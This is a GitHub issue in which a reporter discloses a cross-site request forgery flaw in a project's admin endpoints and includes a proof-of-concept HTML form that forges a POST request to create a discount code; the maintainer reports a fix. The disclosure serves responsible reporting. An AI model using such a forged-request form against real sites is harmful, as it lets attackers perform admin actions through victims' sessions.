Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CSRF on admin privileges #120

Closed
tuo4n8 opened this issue Feb 22, 2020 · 2 comments
Closed

CSRF on admin privileges #120

tuo4n8 opened this issue Feb 22, 2020 · 2 comments

Comments

@tuo4n8
Copy link

tuo4n8 commented Feb 22, 2020
edited

Hi team
I found admin privileges can be cross site request forgery (CSRF) vulnerability . API admin only check session , it is reason led to vulnerablity.

My Poc exploit csrf to create discount code

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:1111/admin/settings/discount/create" method="POST">
      <input type="hidden" name="code" value="CSRF&#45;CODE&#45;DEMO" />
      <input type="hidden" name="type" value="percent" />
      <input type="hidden" name="value" value="30" />
      <input type="hidden" name="start" value="21&#47;02&#47;2020&#32;14&#58;32" />
      <input type="hidden" name="end" value="22&#47;02&#47;2020&#32;14&#58;32" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Video demo here
@mrvautin
Copy link
Owner

Thanks for reporting. Should be fixed in cd3ba1b.

@pate313373
Copy link

Why didn't you implement this fix for normal users as well?
Would be a pitty if somebody ordered more, than he actually thought.... :D ;)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@mrvautin @tuo4n8 @pate313373